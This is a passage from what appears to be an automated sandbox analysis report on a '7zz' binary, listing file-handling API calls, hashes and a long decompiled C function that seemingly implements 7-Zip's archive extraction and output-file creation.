                                                                                  0x0040995f
                                                                                  0x00409964
                                                                                  0x00409965
                                                                                  0x0040996b
                                                                                  0x00409979
                                                                                  0x00409984
                                                                                  0x00409987
                                                                                  0x00409987
                                                                                  0x0040998e
                                                                                  0x004098eb
                                                                                  0x004098ed
                                                                                  0x004098f3
                                                                                  0x004098f3
                                                                                  0x00409995
                                                                                  0x0040999d

                                                                                  APIs
                                                                                  • __EH_prolog.LIBCMT ref: 004098D4
                                                                                  • SetLastError.KERNEL32(00000078), ref: 004098ED
                                                                                  • CreateFileW.KERNELBASE(?,40000000,00000003,00000000,00000003,02000000,00000000), ref: 00409918
                                                                                  • CreateFileW.KERNEL32(?,40000000,00000003,00000000,00000003,02000000,00000000,00000003,?,40000000,00000003,00000000,00000003,02000000,00000000), ref: 00409957
                                                                                  • SetFileTime.KERNELBASE(000000FF,?,?,?,?,40000000,00000003,00000000,00000003,02000000,00000000), ref: 00409979
                                                                                  • CloseHandle.KERNEL32(000000FF,?,40000000,00000003,00000000,00000003,02000000,00000000), ref: 00409987
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000F.00000002.401310359.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 0000000F.00000002.401259398.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000F.00000002.401384599.000000000047A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000F.00000002.401606667.000000000048A000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000F.00000002.401655970.000000000048B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000F.00000002.401667855.000000000048C000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000F.00000002.401685351.000000000048D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000F.00000002.401698545.0000000000490000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000F.00000002.401715453.0000000000499000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_15_2_400000_7zz.jbxd
                                                                                  Similarity
                                                                                  • API ID: File$Create$CloseErrorH_prologHandleLastTime
                                                                                  • String ID:
                                                                                  • API String ID: 1562325489-0
                                                                                  • Opcode ID: a5c80a9bf8aac4bebe81e0320b0504ece2bb406e11bd7c606f3c9c216bf877a2
                                                                                  • Instruction ID: e76a05e07f1340f2f4d5a0f82b1dd14c97c15875a5f06524ffc792fdba8d9db0
                                                                                  • Opcode Fuzzy Hash: a5c80a9bf8aac4bebe81e0320b0504ece2bb406e11bd7c606f3c9c216bf877a2
                                                                                  • Instruction Fuzzy Hash: 7E218C71940209AAEF11AFA4DC02BEEBBB8EF48710F10453AE514B62E1D3790E00CB99
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 00412027 Relevance: 8.0, APIs: 1, Strings: 3, Instructions: 954COMMON
                                                                                  Download Yara Rule
                                                                                  C-Code - Quality: 81%
                                                                                  			E00412027() {
				void* __ebx;
				void* __esi;
				intOrPtr* _t416;
				signed int _t418;
				signed int _t422;
				signed int _t425;
				signed int _t429;
				signed int _t434;
				signed int _t440;
				signed int _t461;
				signed int _t462;
				signed int _t474;
				signed int _t475;
				void* _t476;
				signed int _t479;
				signed int _t480;
				signed int _t490;
				void* _t508;
				signed int _t511;
				intOrPtr* _t512;
				signed int _t515;
				intOrPtr _t516;
				void* _t517;
				void* _t518;
				signed int _t522;
				void* _t533;
				void* _t534;
				void* _t536;
				signed int _t540;
				signed int _t559;
				void* _t570;
				void* _t571;
				signed int _t575;
				signed int _t584;
				signed int _t585;
				signed int _t589;
				signed int _t593;
				intOrPtr _t627;
				signed int _t628;
				void* _t633;
				signed int _t637;
				void* _t643;
				signed int _t651;
				intOrPtr _t681;
				signed int _t754;
				intOrPtr _t791;
				FILETIME* _t793;
				intOrPtr* _t796;
				signed int* _t797;
				intOrPtr* _t798;
				signed int _t800;
				signed int _t801;
				signed int _t802;
				signed int _t804;
				signed int _t805;
				signed int _t808;
				signed int _t810;
				signed int _t812;
				intOrPtr* _t813;
				signed int _t814;
				intOrPtr* _t815;
				intOrPtr* _t816;
				signed int _t817;
				intOrPtr* _t818;
				intOrPtr* _t819;
				signed int _t821;
				void* _t822;
				void* _t824;

				L0046B890(E0047455B, _t822);
				_t810 =  *(_t822 + 8);
				_t651 = 0;
				 *((intOrPtr*)(_t822 - 0x10)) = _t824 - 0x9c;
				_t416 =  *((intOrPtr*)(_t810 + 0xa0));
				_t796 = _t810 + 0xa0;
				 *((intOrPtr*)(_t822 - 4)) = 0;
				if(_t416 != 0) {
					 *((intOrPtr*)( *_t416 + 8))(_t416);
					 *_t796 = 0;
				}
				_t797 = _t810 + 0x98;
				 *( *(_t822 + 0x10)) = _t651;
				_t418 =  *_t797;
				if(_t418 != _t651) {
					 *((intOrPtr*)( *_t418 + 8))(_t418);
					 *_t797 = _t651;
				}
				 *(_t810 + 0x88) = _t651;
				 *(_t810 + 0x5d) = _t651;
				 *(_t810 + 0x58) = _t651;
				 *(_t810 + 0x8c) = _t651;
				 *(_t810 + 0x90) = _t651;
				 *(_t810 + 0x84) =  *(_t822 + 0xc);
				 *(_t822 - 0x48) = _t651;
				 *(_t822 - 0x44) = _t651;
				 *(_t822 - 0x40) = _t651;
				E00401E9A(_t822 - 0x48, 3);
				_push(_t822 - 0x48);
				 *((char*)(_t822 - 4)) = 1;
				_push( *(_t822 + 0xc));
				_t798 =  *((intOrPtr*)( *((intOrPtr*)(_t810 + 0x10))));
				_t422 = L004179F7( *((intOrPtr*)(_t810 + 0x10)));
				if(_t422 == _t651) {
					_t422 = L004179E9(_t810 + 0x80);
					__eflags = _t422 - _t651;
					if(_t422 != _t651) {
						goto L5;
					}
					E00401E26(_t810 + 0x44, _t822 - 0x48);
					 *(_t822 - 0x70) = _t651;
					 *(_t822 - 0x6e) = _t651;
					 *((char*)(_t822 - 4)) = 2;
					_t429 =  *((intOrPtr*)( *_t798 + 0x18))(_t798,  *(_t822 + 0xc), 0x1d, _t822 - 0x70);
					__eflags = _t429 - _t651;
					 *(_t822 + 8) = _t429;
					if(_t429 == _t651) {
						__eflags =  *(_t822 - 0x70) - _t651;
						if( *(_t822 - 0x70) == _t651) {
							L13:
							 *((char*)(_t822 - 4)) = 1;
							E0040C20F(_t822 - 0x70);
							_push(_t810 + 0x5d);
							_push(0xf);
							_t422 = L00417975(_t798,  *(_t822 + 0xc));
							__eflags = _t422 - _t651;
							if(_t422 != _t651) {
								goto L5;
							}
							_t422 = E00411FA9(_t810);
							__eflags = _t422 - _t651;
							if(_t422 != _t651) {
								goto L5;
							}
							__eflags =  *((intOrPtr*)(_t810 + 0x14)) - _t651;
							if( *((intOrPtr*)(_t810 + 0x14)) == _t651) {
								L17:
								__eflags =  *(_t822 + 0x14) - _t651;
								if( *(_t822 + 0x14) != _t651) {
									L146:
									 *( *(_t822 + 0x10)) = _t651;
									L147:
									__eflags =  *((intOrPtr*)(_t810 + 0xba)) - _t651;
									if( *((intOrPtr*)(_t810 + 0xba)) != _t651) {
										_push(0x20);
										_t434 = L004079F2();
										__eflags = _t434 - _t651;
										if(_t434 == _t651) {
											_t434 = 0;
											__eflags = 0;
										} else {
											 *(_t434 + 4) = _t651;
											 *(_t434 + 8) = _t651;
											 *_t434 = 0x47aa54;
										}
										 *(_t810 + 0x9c) = _t434;
										E0040C9B4(_t810 + 0xa0, _t434);
										_t800 =  *(_t810 + 0x9c);
										__eflags = _t800 - _t651;
										 *(_t822 + 0xc) = _t800;
										if(_t800 != _t651) {
											 *((intOrPtr*)( *_t800 + 4))(_t800);
										}
										 *((char*)(_t822 - 4)) = 0x2c;
										E0040C9B4( *(_t810 + 0x9c) + 8,  *( *(_t822 + 0x10)));
										_t440 =  *( *(_t822 + 0x10));
										__eflags = _t440 - _t651;
										if(_t440 != _t651) {
											 *((intOrPtr*)( *_t440 + 8))(_t440);
										}
										 *( *(_t822 + 0x10)) = _t800;
										_t812 =  *(_t810 + 0x9c);
										_t407 = _t812 + 0x18;
										 *_t407 =  *(_t812 + 0x18) | 0xffffffff;
										__eflags =  *_t407;
										 *(_t812 + 0x10) = _t651;
										 *(_t812 + 0x14) = _t651;
										 *((char*)(_t812 + 0x1c)) = 1;
									}
									L156:
									L00407A18( *(_t822 - 0x48));
									_t425 = 0;
									L157:
									 *[fs:0x0] =  *((intOrPtr*)(_t822 - 0xc));
									return _t425;
								}
								__eflags =  *((intOrPtr*)(_t810 + 0xb9)) - _t651;
								if( *((intOrPtr*)(_t810 + 0xb9)) != _t651) {
									goto L146;
								}
								__eflags =  *((intOrPtr*)(_t810 + 0xb8)) - _t651;
								if( *((intOrPtr*)(_t810 + 0xb8)) == _t651) {
									 *(_t822 - 0x70) = _t651;
									 *(_t822 - 0x6e) = _t651;
									 *((char*)(_t822 - 4)) = 3;
									_t801 =  *((intOrPtr*)( *_t798 + 0x18))(_t798,  *(_t822 + 0xc), 9, _t822 - 0x70);
									__eflags = _t801 - _t651;
									if(_t801 == _t651) {
										__eflags =  *(_t822 - 0x70) - 0x13;
										if( *(_t822 - 0x70) != 0x13) {
											__eflags =  *(_t822 - 0x70) - _t651;
											if( *(_t822 - 0x70) != _t651) {
												 *((char*)(_t822 - 4)) = 1;
												E0040C20F(_t822 - 0x70);
												_t801 = 0x80004005;
												L145:
												L00407A18( *(_t822 - 0x48));
												_t425 = _t801;
												goto L157;
											}
											 *(_t810 + 0x7f) = _t651;
											L32:
											 *((char*)(_t822 - 4)) = 1;
											E0040C20F(_t822 - 0x70);
											_t802 =  *(_t822 + 0xc);
											_push(_t810 + 0x7c);
											_push(_t810 + 0x60);
											_push(0xa);
											_push(_t802);
											_t422 = E00411F1A(_t810);
											__eflags = _t422 - _t651;
											if(_t422 != _t651) {
												goto L5;
											}
											_push(_t810 + 0x7d);
											_push(_t810 + 0x68);
											_push(0xb);
											_push(_t802);
											_t422 = E00411F1A(_t810);
											__eflags = _t422 - _t651;
											if(_t422 != _t651) {
												goto L5;
											}
											_push(_t810 + 0x7e);
											_push(_t810 + 0x70);
											_push(0xc);
											_push(_t802);
											_t422 = E00411F1A(_t810);
											__eflags = _t422 - _t651;
											if(_t422 != _t651) {
												goto L5;
											}
											 *(_t822 + 0xb) = _t651;
											_push(_t822 + 0xb);
											_push(0x15);
											_t422 = L00417975( *((intOrPtr*)( *((intOrPtr*)(_t810 + 0x10)))), _t802);
											__eflags = _t422 - _t651;
											if(_t422 != _t651) {
												goto L5;
											}
											E00405B9F(_t822 - 0x24);
											_t803 = 0x47a420;
											 *((intOrPtr*)(_t822 - 0x24)) = 0x47a420;
											 *((char*)(_t822 - 4)) = 4;
											E00408833(_t822 - 0x48, _t822 - 0x24, __eflags);
											_t681 =  *((intOrPtr*)(_t822 - 0x1c));
											__eflags = _t681 - _t651;
											if(_t681 != _t651) {
												 *(_t822 + 0xc) = _t651;
												_t461 =  *((intOrPtr*)(_t810 + 0x30)) - 1;
												__eflags = _t461;
												if(_t461 == 0) {
													_t462 =  *(_t810 + 0xac);
													__eflags = _t681 - _t462;
													 *(_t822 + 0xc) = _t462;
													if(_t681 > _t462) {
														_t804 = 0;
														__eflags = 0;
														while(1) {
															__eflags = _t804 -  *(_t822 + 0xc);
															if(_t804 >=  *(_t822 + 0xc)) {
																break;
															}
															_t633 = E0040807A( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t822 - 0x18)) + _t804 * 4)))));
															__eflags = _t633 - _t651;
															if(_t633 == _t651) {
																_t804 = _t804 + 1;
																continue;
															}
															 *((intOrPtr*)(_t822 - 0x24)) = 0x47a420;
															 *((char*)(_t822 - 4)) = 7;
															L89:
															E0040862D();
															 *((char*)(_t822 - 4)) = 1;
															E00408604(_t822 - 0x24);
															_t651 = 0x80004005;
															L141:
															L00407A18( *(_t822 - 0x48));
															_t425 = _t651;
															goto L157;
														}
														_t803 = 0x47a420;
														L49:
														L004036D9(_t651, _t822 - 0x24, _t810, _t651,  *(_t822 + 0xc));
														L00416D6F(_t822 - 0x24);
														L004170F2(_t822 - 0x3c, _t822 - 0x24, __eflags);
														__eflags =  *(_t822 + 0xb) - _t651;
														 *((char*)(_t822 - 4)) = 8;
														if( *(_t822 + 0xb) != _t651) {
															L71:
															_t772 = _t810 + 0x24;
															_push(_t822 - 0x3c);
															L0040B0A0(_t822 - 0x30, _t810 + 0x24);
															__eflags =  *((intOrPtr*)(_t810 + 0x80)) - _t651;
															 *((char*)(_t822 - 4)) = 0xa;
															if( *((intOrPtr*)(_t810 + 0x80)) == _t651) {
																__eflags =  *(_t810 + 0x58) - _t651;
																if( *(_t810 + 0x58) != _t651) {
																	L117:
																	__eflags =  *(_t822 + 0xb) - _t651;
																	if( *(_t822 + 0xb) != _t651) {
																		L143:
																		E00401E26(_t810 + 0x38, _t822 - 0x30);
																		L00407A18( *((intOrPtr*)(_t822 - 0x30)));
																		L00407A18( *((intOrPtr*)(_t822 - 0x3c)));
																		 *((intOrPtr*)(_t822 - 0x24)) = _t803;
																		 *((char*)(_t822 - 4)) = 0x2b;
																		E0040862D();
																		 *((char*)(_t822 - 4)) = 1;
																		E00408604(_t822 - 0x24);
																		goto L147;
																	}
																	_push(0x20);
																	_t474 = L004079F2();
																	__eflags = _t474 - _t651;
																	if(_t474 == _t651) {
																		_t805 = 0;
																		__eflags = 0;
																	} else {
																		 *(_t474 + 4) = _t651;
																		 *(_t474 + 8) =  *(_t474 + 8) | 0xffffffff;
																		 *_t474 = 0x47aa64;
																		_t805 = _t474;
																	}
																	__eflags = _t805 - _t651;
																	 *(_t810 + 0x94) = _t805;
																	 *(_t822 + 0x14) = _t805;
																	if(_t805 != _t651) {
																		 *((intOrPtr*)( *_t805 + 4))(_t805);
																	}
																	_t475 =  *(_t810 + 0x94);
																	 *((char*)(_t822 - 4)) = 0x26;
																	asm("sbb edx, edx");
																	 *(_t475 + 0x18) = _t651;
																	 *(_t475 + 0x1c) = _t651;
																	_t476 = L0040BD54( *((intOrPtr*)(_t822 - 0x30)), ( ~( *(_t810 + 0x58)) & 0x00000002) + 2);
																	__eflags = _t476 - _t651;
																	if(_t476 != _t651) {
																		__eflags =  *(_t810 + 0x58) - _t651;
																		if( *(_t810 + 0x58) == _t651) {
																			L142:
																			E0040C9B4(_t810 + 0x98, _t805);
																			 *((char*)(_t822 - 4)) = 0xa;
																			 *( *(_t822 + 0x10)) = _t805;
																			_t803 = 0x47a420;
																			goto L143;
																		}
																		_t479 =  *(_t810 + 0x94);
																		_t480 =  *((intOrPtr*)( *_t479 + 0x10))(_t479,  *((intOrPtr*)(_t810 + 0x50)),  *((intOrPtr*)(_t810 + 0x54)), _t651, _t651);
																		__eflags = _t480 - _t651;
																		 *(_t822 + 0xc) = _t480;
																		if(_t480 == _t651) {
																			goto L142;
																		}
																		__eflags = _t805 - _t651;
																		 *((char*)(_t822 - 4)) = 0xa;
																		if(_t805 != _t651) {
																			 *((intOrPtr*)( *_t805 + 8))(_t805);
																		}
																		L00407A18( *((intOrPtr*)(_t822 - 0x30)));
																		L00407A18( *((intOrPtr*)(_t822 - 0x3c)));
																		 *((intOrPtr*)(_t822 - 0x24)) = 0x47a420;
																		 *((char*)(_t822 - 4)) = 0x2a;
																		E0040862D();
																		 *((char*)(_t822 - 4)) = 1;
																		E00408604(_t822 - 0x24);
																		_t651 =  *(_t822 + 0xc);
																	} else {
																		L00412FDC(_t822 - 0x60, L"can not open output file ");
																		_t813 =  *((intOrPtr*)(_t810 + 0x18));
																		 *((char*)(_t822 - 4)) = 0x27;
																		_t490 =  *((intOrPtr*)( *_t813 + 0x1c))(_t813,  *((intOrPtr*)(_t822 - 0x60)), _t822 - 0x30);
																		_push( *((intOrPtr*)(_t822 - 0x60)));
																		_t814 = _t490;
																		__eflags = _t814 - _t651;
																		if(_t814 == _t651) {
																			L00407A18();
																			__eflags = _t805 - _t651;
																			 *((char*)(_t822 - 4)) = 0xa;
																			if(_t805 != _t651) {
																				 *((intOrPtr*)( *_t805 + 8))(_t805);
																			}
																			L00407A18( *((intOrPtr*)(_t822 - 0x30)));
																			L00407A18( *((intOrPtr*)(_t822 - 0x3c)));
																			 *((intOrPtr*)(_t822 - 0x24)) = 0x47a420;
																			 *((char*)(_t822 - 4)) = 0x29;
																			L94:
																			E0040862D();
																			 *((char*)(_t822 - 4)) = 1;
																			E00408604(_t822 - 0x24);
																			goto L141;
																		}
																		L00407A18();
																		__eflags = _t805 - _t651;
																		 *((char*)(_t822 - 4)) = 0xa;
																		if(_t805 != _t651) {
																			 *((intOrPtr*)( *_t805 + 8))(_t805);
																		}
																		L00407A18( *((intOrPtr*)(_t822 - 0x30)));
																		L00407A18( *((intOrPtr*)(_t822 - 0x3c)));
																		 *((intOrPtr*)(_t822 - 0x24)) = 0x47a420;
																		 *((char*)(_t822 - 4)) = 0x28;
																		L123:
																		E0040862D();
																		 *((char*)(_t822 - 4)) = 1;
																		E00408604(_t822 - 0x24);
																		_t651 = _t814;
																	}
																	goto L141;
																}
																L0040351A(_t822 - 0x80);
																_push( *((intOrPtr*)(_t822 - 0x30)));
																 *((char*)(_t822 - 4)) = 0xc;
																_t508 = E0040B431(_t822 - 0xa8, _t772, __eflags); // executed
																__eflags = _t508 - _t651;
																if(_t508 == _t651) {
																	L116:
																	 *((char*)(_t822 - 4)) = 0xa;
																	L00407A18( *((intOrPtr*)(_t822 - 0x80)));
																	goto L117;
																}
																_t511 =  *((intOrPtr*)(_t810 + 0x34)) - _t651;
																__eflags = _t511;
																if(_t511 == 0) {
																	asm("sbb edx, edx");
																	_t512 =  *((intOrPtr*)(_t810 + 0x18));
																	asm("sbb edx, edx");
																	_t808 =  *((intOrPtr*)( *_t512 + 0x14))(_t512,  *((intOrPtr*)(_t822 - 0x30)), _t822 - 0x90, _t822 - 0xa8,  *(_t822 - 0x48),  ~( *(_t810 + 0x7e)) & _t810 + 0x00000070,  ~( *(_t810 + 0x90)) & _t810 + 0x00000088, _t822 + 0xc);
																	__eflags = _t808 - _t651;
																	if(_t808 == _t651) {
																		_t515 =  *(_t822 + 0xc) - _t651;
																		__eflags = _t515;
																		if(_t515 == 0) {
																			L96:
																			_t803 = 0x47a420;
																			L97:
																			_t516 =  *((intOrPtr*)(_t810 + 0x34));
																			__eflags = _t516 - 3;
																			if(__eflags != 0) {
																				__eflags = _t516 - 4;
																				if(_t516 != 4) {
																					_t517 = E00409F99( *((intOrPtr*)(_t822 - 0x30)));
																					__eflags = _t517 - _t651;
																					if(_t517 != _t651) {
																						goto L116;
																					}
																					_t518 = L00403532(_t822 - 0x6c,  *0x48bd9c);
																					 *((char*)(_t822 - 4)) = 0x21;
																					L0040B0A0(_t822 - 0x60, _t518);
																					 *((char*)(_t822 - 4)) = 0x23;
																					L00407A18( *((intOrPtr*)(_t822 - 0x6c)));
																					_t815 =  *((intOrPtr*)(_t810 + 0x18));
																					_t522 =  *((intOrPtr*)( *_t815 + 0x1c))(_t815,  *((intOrPtr*)(_t822 - 0x60)), _t822 - 0x30);
																					_push( *((intOrPtr*)(_t822 - 0x60)));
																					_t814 = _t522;
																					__eflags = _t814 - _t651;
																					if(_t814 == _t651) {
																						L00407A18();
																						L00407A18( *((intOrPtr*)(_t822 - 0x80)));
																						L00407A18( *((intOrPtr*)(_t822 - 0x30)));
																						L00407A18( *((intOrPtr*)(_t822 - 0x3c)));
																						 *((intOrPtr*)(_t822 - 0x24)) = _t803;
																						 *((char*)(_t822 - 4)) = 0x25;
																						goto L94;
																					}
																					L00407A18();
																					L00407A18( *((intOrPtr*)(_t822 - 0x80)));
																					L00407A18( *((intOrPtr*)(_t822 - 0x30)));
																					L00407A18( *((intOrPtr*)(_t822 - 0x3c)));
																					 *((intOrPtr*)(_t822 - 0x24)) = _t803;
																					 *((char*)(_t822 - 4)) = 0x24;
																					goto L123;
																				}
																				L004039C0(_t822 - 0x54, _t822 - 0x30);
																				 *((char*)(_t822 - 4)) = 0x18;
																				_t533 = E0040CD50(_t822 - 0x54, __eflags);
																				__eflags = _t533 - _t651;
																				if(_t533 != _t651) {
																					_t534 = E00409BC3( *((intOrPtr*)(_t822 - 0x30)),  *(_t822 - 0x54));
																					__eflags = _t534 - _t651;
																					if(_t534 != _t651) {
																						L00407A18( *(_t822 - 0x54));
																						goto L116;
																					}
																					_t536 = L00403532(_t822 - 0x6c,  *0x48bd98);
																					 *((char*)(_t822 - 4)) = 0x1c;
																					L0040B0A0(_t822 - 0x60, _t536);
																					 *((char*)(_t822 - 4)) = 0x1e;
																					L00407A18( *((intOrPtr*)(_t822 - 0x6c)));
																					_t816 =  *((intOrPtr*)(_t810 + 0x18));
																					_t540 =  *((intOrPtr*)( *_t816 + 0x1c))(_t816,  *((intOrPtr*)(_t822 - 0x60)), _t822 - 0x30);
																					_push( *((intOrPtr*)(_t822 - 0x60)));
																					_t817 = _t540;
																					__eflags = _t817 - _t651;
																					if(_t817 == _t651) {
																						L00407A18();
																						L00407A18( *(_t822 - 0x54));
																						L00407A18( *((intOrPtr*)(_t822 - 0x80)));
																						L00407A18( *((intOrPtr*)(_t822 - 0x30)));
																						L00407A18( *((intOrPtr*)(_t822 - 0x3c)));
																						 *((intOrPtr*)(_t822 - 0x24)) = _t803;
																						 *((char*)(_t822 - 4)) = 0x20;
																						L112:
																						E0040862D();
																						 *((char*)(_t822 - 4)) = 1;
																						E00408604(_t822 - 0x24);
																						L113:
																						_t817 = 0x80004005;
																						L114:
																						L00407A18( *(_t822 - 0x48));
																						_t425 = _t817;
																						goto L157;
																					}
																					L00407A18();
																					L00407A18( *(_t822 - 0x54));
																					L00407A18( *((intOrPtr*)(_t822 - 0x80)));
																					L00407A18( *((intOrPtr*)(_t822 - 0x30)));
																					L00407A18( *((intOrPtr*)(_t822 - 0x3c)));
																					 *((intOrPtr*)(_t822 - 0x24)) = _t803;
																					 *((char*)(_t822 - 4)) = 0x1f;
																					L110:
																					E0040862D();
																					 *((char*)(_t822 - 4)) = 1;
																					E00408604(_t822 - 0x24);
																					goto L114;
																				}
																				_t791 =  *0x48bd94; // 0x48be34
																				L00412FDC(_t822 - 0x60, _t791);
																				_t818 =  *((intOrPtr*)(_t810 + 0x18));
																				 *((char*)(_t822 - 4)) = 0x19;
																				_t559 =  *((intOrPtr*)( *_t818 + 0x1c))(_t818,  *((intOrPtr*)(_t822 - 0x60)), _t822 - 0x30);
																				_push( *((intOrPtr*)(_t822 - 0x60)));
																				_t817 = _t559;
																				__eflags = _t817 - _t651;
																				if(_t817 == _t651) {
																					L00407A18();
																					L00407A18( *(_t822 - 0x54));
																					L00407A18( *((intOrPtr*)(_t822 - 0x80)));
																					L00407A18( *((intOrPtr*)(_t822 - 0x30)));
																					L00407A18( *((intOrPtr*)(_t822 - 0x3c)));
																					 *((intOrPtr*)(_t822 - 0x24)) = _t803;
																					 *((char*)(_t822 - 4)) = 0x1b;
																					goto L112;
																				}
																				L00407A18();
																				L00407A18( *(_t822 - 0x54));
																				L00407A18( *((intOrPtr*)(_t822 - 0x80)));
																				L00407A18( *((intOrPtr*)(_t822 - 0x30)));
																				L00407A18( *((intOrPtr*)(_t822 - 0x3c)));
																				 *((intOrPtr*)(_t822 - 0x24)) = _t803;
																				 *((char*)(_t822 - 4)) = 0x1a;
																				goto L110;
																			}
																			_t570 = E0040CD50(_t822 - 0x30, __eflags);
																			__eflags = _t570 - _t651;
																			if(_t570 != _t651) {
																				goto L116;
																			}
																			_t571 = L00403532(_t822 - 0x60,  *0x48bd94);
																			 *((char*)(_t822 - 4)) = 0x13;
																			L0040B0A0(_t822 - 0x54, _t571);
																			 *((char*)(_t822 - 4)) = 0x15;
																			L00407A18( *((intOrPtr*)(_t822 - 0x60)));
																			_t819 =  *((intOrPtr*)(_t810 + 0x18));
																			_t575 =  *((intOrPtr*)( *_t819 + 0x1c))(_t819,  *(_t822 - 0x54), _t822 - 0x30);
																			_push( *(_t822 - 0x54));
																			_t817 = _t575;
																			__eflags = _t817 - _t651;
																			if(_t817 == _t651) {
																				L00407A18();
																				L00407A18( *((intOrPtr*)(_t822 - 0x80)));
																				L00407A18( *((intOrPtr*)(_t822 - 0x30)));
																				L00407A18( *((intOrPtr*)(_t822 - 0x3c)));
																				 *((intOrPtr*)(_t822 - 0x24)) = _t803;
																				 *((char*)(_t822 - 4)) = 0x17;
																				goto L112;
																			}
																			L00407A18();
																			L00407A18( *((intOrPtr*)(_t822 - 0x80)));
																			L00407A18( *((intOrPtr*)(_t822 - 0x30)));
																			L00407A18( *((intOrPtr*)(_t822 - 0x3c)));
																			 *((intOrPtr*)(_t822 - 0x24)) = _t803;
																			 *((char*)(_t822 - 4)) = 0x16;
																			goto L110;
																		}
																		_t584 = _t515 - 1;
																		__eflags = _t584;
																		if(_t584 == 0) {
																			 *((intOrPtr*)(_t810 + 0x34)) = 1;
																			goto L96;
																		}
																		_t585 = _t584 - 1;
																		__eflags = _t585;
																		if(_t585 == 0) {
																			L00407A18( *((intOrPtr*)(_t822 - 0x80)));
																			L00407A18( *((intOrPtr*)(_t822 - 0x30)));
																			L00407A18( *((intOrPtr*)(_t822 - 0x3c)));
																			 *((intOrPtr*)(_t822 - 0x24)) = 0x47a420;
																			 *((char*)(_t822 - 4)) = 0x10;
																			goto L94;
																		}
																		_t589 = _t585 - 1;
																		__eflags = _t589;
																		if(_t589 == 0) {
																			 *((intOrPtr*)(_t810 + 0x34)) = 2;
																			L00407A18( *((intOrPtr*)(_t822 - 0x80)));
																			L00407A18( *((intOrPtr*)(_t822 - 0x30)));
																			L00407A18( *((intOrPtr*)(_t822 - 0x3c)));
																			 *((intOrPtr*)(_t822 - 0x24)) = 0x47a420;
																			 *((char*)(_t822 - 4)) = 0x11;
																			goto L94;
																		}
																		_t593 = _t589 - 1;
																		__eflags = _t593;
																		if(_t593 == 0) {
																			 *((intOrPtr*)(_t810 + 0x34)) = 3;
																			goto L96;
																		}
																		_push( *((intOrPtr*)(_t822 - 0x80)));
																		__eflags = _t593 == 1;
																		if(_t593 == 1) {
																			L00407A18();
																			L00407A18( *((intOrPtr*)(_t822 - 0x30)));
																			L00407A18( *((intOrPtr*)(_t822 - 0x3c)));
																			 *((intOrPtr*)(_t822 - 0x24)) = 0x47a420;
																			 *((char*)(_t822 - 4)) = 0xf;
																			E0040862D();
																			 *((char*)(_t822 - 4)) = 1;
																			E00408604(_t822 - 0x24);
																			_t651 = 0x80004004;
																			goto L141;
																		}
																		L00407A18();
																		L00407A18( *((intOrPtr*)(_t822 - 0x30)));
																		L00407A18( *((intOrPtr*)(_t822 - 0x3c)));
																		 *((intOrPtr*)(_t822 - 0x24)) = 0x47a420;
																		 *((char*)(_t822 - 4)) = 0x12;
																		goto L89;
																	}
																	L00407A18( *((intOrPtr*)(_t822 - 0x80)));
																	L00407A18( *((intOrPtr*)(_t822 - 0x30)));
																	L00407A18( *((intOrPtr*)(_t822 - 0x3c)));
																	 *((intOrPtr*)(_t822 - 0x24)) = 0x47a420;
																	 *((char*)(_t822 - 4)) = 0xe;
																	E0040862D();
																	 *((char*)(_t822 - 4)) = 1;
																	E00408604(_t822 - 0x24);
																	_t651 = _t808;
																	goto L141;
																}
																__eflags = _t511 != 0;
																if(_t511 != 0) {
																	goto L97;
																}
																L00407A18( *((intOrPtr*)(_t822 - 0x80)));
																L00407A18( *((intOrPtr*)(_t822 - 0x30)));
																L00407A18( *((intOrPtr*)(_t822 - 0x3c)));
																 *((intOrPtr*)(_t822 - 0x24)) = _t803;
																 *((char*)(_t822 - 4)) = 0xd;
																E0040862D();
																 *((char*)(_t822 - 4)) = 1;
																E00408604(_t822 - 0x24);
																goto L156;
															}
															_t820 = _t810 + 0x38;
															E00401E26(_t810 + 0x38, _t822 - 0x30);
															__eflags =  *(_t822 + 0xb) - _t651;
															if( *(_t822 + 0xb) != _t651) {
																E00409B24( *_t820);
															}
															L00407A18( *((intOrPtr*)(_t822 - 0x30)));
															L00407A18( *((intOrPtr*)(_t822 - 0x3c)));
															 *((intOrPtr*)(_t822 - 0x24)) = _t803;
															 *((char*)(_t822 - 4)) = 0xb;
															goto L94;
														}
														__eflags =  *((intOrPtr*)(_t810 + 0x80)) - _t651;
														if( *((intOrPtr*)(_t810 + 0x80)) != _t651) {
															L53:
															__eflags =  *((intOrPtr*)(_t822 - 0x1c)) - _t651;
															if( *((intOrPtr*)(_t822 - 0x1c)) == _t651) {
																goto L71;
															}
															 *(_t822 - 0x54) = _t651;
															 *(_t822 - 0x50) = _t651;
															 *(_t822 - 0x4c) = _t651;
															E00401E9A(_t822 - 0x54, 3);
															_push(_t822 - 0x54);
															 *((char*)(_t822 - 4)) = 9;
															E00411ED0(_t810, _t822, _t822 - 0x24);
															__eflags =  *((intOrPtr*)(_t810 + 0x80)) - _t651;
															if( *((intOrPtr*)(_t810 + 0x80)) == _t651) {
																L70:
																 *((char*)(_t822 - 4)) = 8;
																L00407A18( *(_t822 - 0x54));
																goto L71;
															}
															__eflags =  *((intOrPtr*)(_t810 + 0x5c)) - _t651;
															if( *((intOrPtr*)(_t810 + 0x5c)) == _t651) {
																L58:
																_t627 =  *((intOrPtr*)(_t810 + 0x10));
																__eflags =  *((intOrPtr*)(_t627 + 0x2c)) - _t651;
																if( *((intOrPtr*)(_t627 + 0x2c)) == _t651) {
																	_t628 = 0;
																	__eflags = 0;
																} else {
																	_t628 = _t627 + 0x24;
																}
																L61:
																__eflags =  *((intOrPtr*)(_t810 + 0x5b)) - _t651;
																if( *((intOrPtr*)(_t810 + 0x5b)) == _t651) {
																	L64:
																	_t754 = 0;
